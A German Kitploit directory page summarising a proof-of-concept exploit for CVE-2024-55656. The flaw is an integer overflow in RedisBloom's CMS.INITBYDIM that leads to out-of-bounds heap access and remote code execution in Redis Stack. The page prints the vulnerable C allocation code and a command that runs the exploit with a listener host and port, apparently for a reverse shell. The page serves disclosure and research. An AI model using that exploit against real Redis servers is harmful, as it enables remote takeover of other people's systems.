Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
redis-stack-CVE-2024-55656 — Proof-of-Concept-Exploit für CVE-2024-55656, eine Integer-Überlauf in RedisBloom, der zu heap-basiertem OOB-Lesen/Schreiben und Remote-Code-Ausführung in Redis Stack 7.2.0-v10 führt. | Kitploit
Tools/GitHubGitHub/rick2600/redis-stack-cve-2024-55656
SpeicherforensikSchwachstellenanalyseExploitationPenetrationstestsDatenbanksicherheitBinary-Exploitation
GitHubrick2600/redis-stack-cve-2024-55656

redis-stack-CVE-2024-55656

Proof-of-Concept-Exploit für CVE-2024-55656, eine Integer-Überlauf in RedisBloom, der zu heap-basiertem OOB-Lesen/Schreiben und Remote-Code-Ausführung in Redis Stack 7.2.0-v10 führt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 JahrNoch nicht geprüft

CVE-2024-55656 - Redis Stack - RedisBloom Integer Overflow Remote Code Execution Sicherheitslücke

  • Titel: Redis Stack RedisBloom Integer Overflow Remote Code Execution Sicherheitslücke
  • ZDI: ZDI-25-009
  • CVE: CVE-2024-55656
  • Credits: rick2600 and gqsilva
  • CVSS: 8.8 (HIGH)
  • Betroffene Version: RedisBloom v2.6.12 ausgeliefert mit Redis Stack 7.2.0-v10

Analyse (Kurzfassung)

Es liegt eine Integer Overflow Sicherheitslücke in RedisBloom (https://github.com/RedisBloom/RedisBloom) vor, einem Modul, das in Redis (https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/) verwendet wird. Die Integer Overflow Sicherheitslücke erlaubt es einem Angreifer (einem Redis-Client, der das Passwort kennt), aufgrund eines Überlaufs weniger Speicher im Heap zu allozieren als erforderlich. Dann können Lese- und Schreiboperationen über diesen alloziierten Speicher hinaus durchgeführt werden, was zu einem Informationsleck und einem Out-of-Bounds-Schreibzugriff (OOB write) führt.

Der Integer Overflow befindet sich im Befehl CMS.INITBYDIM, der einen Count-Min Sketch mit vom Benutzer angegebenen Dimensionen initialisiert. Er akzeptiert zwei Werte (Breite und Tiefe) und verwendet sie, um Speicher in NewCMSketch() zu allozieren.

Datei: src/cms.c

root@kitploit:~
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}

OOB-Lesen wird durch den Befehl CMS.QUERY erreicht, der in CMS_Query() implementiert ist.

OOB-Schreiben wird durch den Befehl CMS.INCRBY erreicht, der in CMS_IncrBy() implementiert ist.

Für die vollständige Analyse siehe die Sicherheitsmitteilung

Proof-of-Concept

  1. Redis-Stack starten

docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10

  1. Exploit ausführen

python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444

Referenzen

  1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
  2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
  3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
Tool herunterladen